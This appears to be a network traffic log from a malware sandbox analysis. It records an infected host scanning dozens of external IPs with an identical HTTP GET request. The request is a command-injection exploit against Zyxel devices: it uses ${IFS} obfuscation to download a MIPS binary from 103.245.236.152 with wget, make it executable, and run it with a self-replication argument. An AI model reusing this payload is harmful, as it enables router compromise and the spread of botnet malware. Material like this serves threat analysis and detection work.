                                        Jan 14, 2024 16:18:57.758979082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8038192.168.2.133761087.119.206.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759011030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8039192.168.2.1333778196.111.201.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759064913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8040192.168.2.133367271.100.165.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759094954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8041192.168.2.1348414157.224.83.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759128094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8042192.168.2.135372840.94.227.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759179115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8043192.168.2.1337478223.35.247.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759215117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8044192.168.2.1342016112.23.145.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759259939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8045192.168.2.1351586107.243.58.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759282112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8046192.168.2.135063685.86.55.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759347916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8047192.168.2.135461654.49.136.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759361982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8048192.168.2.1358852202.160.180.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759413004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8049192.168.2.134610614.51.186.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759464979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8050192.168.2.1342684223.90.184.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759510994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8051192.168.2.1352426100.31.95.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759560108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8052192.168.2.1341778121.47.235.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759604931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8053192.168.2.135494682.61.11.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759617090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8054192.168.2.134191485.138.211.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759651899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8055192.168.2.1344446167.161.195.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759691000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8056192.168.2.1347066139.152.231.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759732962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8057192.168.2.134106038.159.225.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759768963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8058192.168.2.134400886.158.255.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759802103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8059192.168.2.1356822164.229.111.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759826899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8060192.168.2.135078085.183.150.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759865046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8061192.168.2.1338002136.146.14.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759906054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8062192.168.2.133857212.149.176.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759923935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8063192.168.2.1351892146.239.136.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.759951115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8064192.168.2.133545420.32.204.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760023117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8065192.168.2.134807019.161.137.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760065079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8066192.168.2.1360150188.7.9.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760098934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8067192.168.2.134376450.43.246.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760133982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8068192.168.2.133524861.175.249.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760168076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8069192.168.2.134974278.155.200.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760207891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8070192.168.2.1347952155.219.127.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760261059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8071192.168.2.134700483.163.232.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760302067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8072192.168.2.1335384191.67.157.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760334015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8073192.168.2.135370699.222.226.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760360003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8074192.168.2.1351448151.11.236.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760406017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8075192.168.2.1348190146.99.126.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760432959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8076192.168.2.1350854174.219.183.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760487080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8077192.168.2.1334130156.240.231.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760528088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8078192.168.2.1333998213.173.12.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760550022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8079192.168.2.133863681.37.194.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760592937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8080192.168.2.135048441.148.2.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760628939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8081192.168.2.1340878221.253.137.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760660887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8082192.168.2.133364483.124.20.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760709047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8083192.168.2.133659613.178.145.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760750055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8084192.168.2.1344314217.40.120.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760776043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8085192.168.2.133687044.34.232.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760826111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8086192.168.2.135518237.102.134.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760904074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8087192.168.2.134215684.140.199.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760921955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8088192.168.2.1345588216.108.11.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.760970116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8089192.168.2.1359804190.142.135.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761009932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8090192.168.2.133732878.27.231.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761061907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8091192.168.2.1349262110.130.24.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761118889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8092192.168.2.13571965.35.135.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761157036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8093192.168.2.13510722.135.212.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761203051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8094192.168.2.1360546123.218.222.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761228085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8095192.168.2.1345014165.5.214.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761271000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8096192.168.2.1350382142.5.249.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761310101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8097192.168.2.133723219.168.235.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761368990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8098192.168.2.1339180217.182.208.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761390924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8099192.168.2.1354142223.200.3.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761445045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8100192.168.2.1338664154.92.80.9443
                                        TimestampBytes transferredDirectionData
